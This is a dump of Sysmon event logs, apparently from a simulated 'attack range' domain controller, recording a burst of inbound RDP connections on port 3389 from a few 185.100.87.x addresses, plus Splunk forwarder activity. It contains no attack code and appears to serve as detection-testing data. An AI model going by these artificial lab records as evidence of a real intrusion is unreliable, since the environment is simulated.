354300x800000000000000099600Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:55.018{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-37048-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099599Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:55.011{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53334-false10.0.1.12-8000- 354300x800000000000000099598Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.807{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-36658-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099610Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:56.829{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-53324-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099609Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:56.642{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-39710-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099608Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:56.507{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsefalse185.100.87.231-52710-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099619Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:57.774{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-55426-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099618Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:57.744{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-41678-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099617Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:57.522{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-41296-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099616Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:57.497{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-41224-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099615Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:57.435{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-54684-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099614Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:57.318{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-54432-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099613Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:57.006{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-53696-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099612Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:56.847{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-40048-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
23542300x800000000000000099611Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:01.053{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E7EAD282687196AADA36D87A0D84FC2,SHA256=BC5B069850781A1A21EAD5709E8DCED8FD41145BAA26D14FE39BAB2218805A80,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000099628Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.521{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20C27D8C35E1EF0FC0BFC163D255E889,SHA256=0307204356A13CA3544E5122A5A910E7BE45EA5DA32278CC60341ACC7CBC6FEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
354300x800000000000000099627Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:58.849{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-57640-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099626Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:58.684{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-57248-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099625Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:58.684{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-43316-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099624Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:58.654{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-60984-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099623Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:58.490{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-42954-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099622Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:58.385{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-56648-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099621Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:58.295{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-60050-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
23542300x800000000000000099620Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.146{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E262284FFF87CB9322FD47BAE0183DE9,SHA256=101F47F68A60662BA401771C4A4C2F13C71B4F4A85F41F0C80B0A53B21035466,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
354300x800000000000000099639Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.651{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-59306-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099638Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.569{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-44860-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099637Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.481{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-34426-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099636Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.351{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-44466-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099635Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.339{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-44468-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099634Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.267{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-58544-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099633Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.182{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-58352-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099632Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.027{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-33568-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099631Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.019{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-33590-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099630Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.017{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-33578-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
23542300x800000000000000099629Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:03.240{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C4640EEF3734612C234C032097E6F73,SHA256=E0DBAC43D533B9D0F2E6AA1DEBCA009009D470186250AA7E2E990C192FA5A285,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
354300x800000000000000099651Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.971{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-37588-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099650Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.948{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53335-false10.0.1.12-8000-
354300x800000000000000099649Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.878{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-37392-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099648Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.864{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-37356-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099647Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.713{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-33392-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099646Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.594{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-33130-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099645Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.552{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-36760-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099644Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.534{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-46584-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099643Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.331{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-46234-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099642Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.305{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-36088-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099641Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.213{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-60590-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
23542300x800000000000000099640Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.334{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C7716A719158A31EAC4B037E1CCE7F8,SHA256=F13C1D6549503CD5C79FE7BF58D5C42F18077D10A2392B4950B70DAD775C8958,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000099659Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:05.427{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F2E7061CF32D689A1F6DB56518A89D6,SHA256=B944D53FC7AF428E04B904BD8294D5CC8E688C3B3A6FCB239D84B4933A3C33D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
354300x800000000000000099658Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:01.517{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-35070-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099657Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:01.424{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-48126-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099656Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:01.372{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-38396-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099655Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:01.213{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-47780-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099654Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:01.173{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-47676-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099653Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:01.107{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-34240-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099652Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:01.020{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-34042-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
23542300x800000000000000099671Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.521{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B5CF8E802F3A2634FA6ABC19264A5E9,SHA256=9D8F694A7B4E2CBB2321DC5F454C6D83F56AA93AC2640067427CFA99C15EDFDB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
354300x800000000000000099670Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.872{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-41288-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099669Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.862{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-37700-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099668Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.762{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-41108-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099667Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.748{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-41092-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099666Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.557{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-37046-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099665Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.431{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-36800-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099664Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.428{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-40460-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099663Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.366{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-49618-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099662Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.200{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-39938-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099661Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.169{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-49296-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099660Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.055{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-36102-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
23542300x800000000000000099680Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.615{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42399E9CC1F06CD090CF022905DA0A1E,SHA256=920AE4C0EF29F53BAB0CEB04739EDE556D69A0862E633E994C1D6A1D80E4754A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
354300x800000000000000099679Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.029{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-52492-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099678Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:03.895{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-39688-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099677Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:03.375{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-38630-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099676Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:03.259{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-51148-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099675Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:03.247{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-41992-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099674Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:03.079{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-50836-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
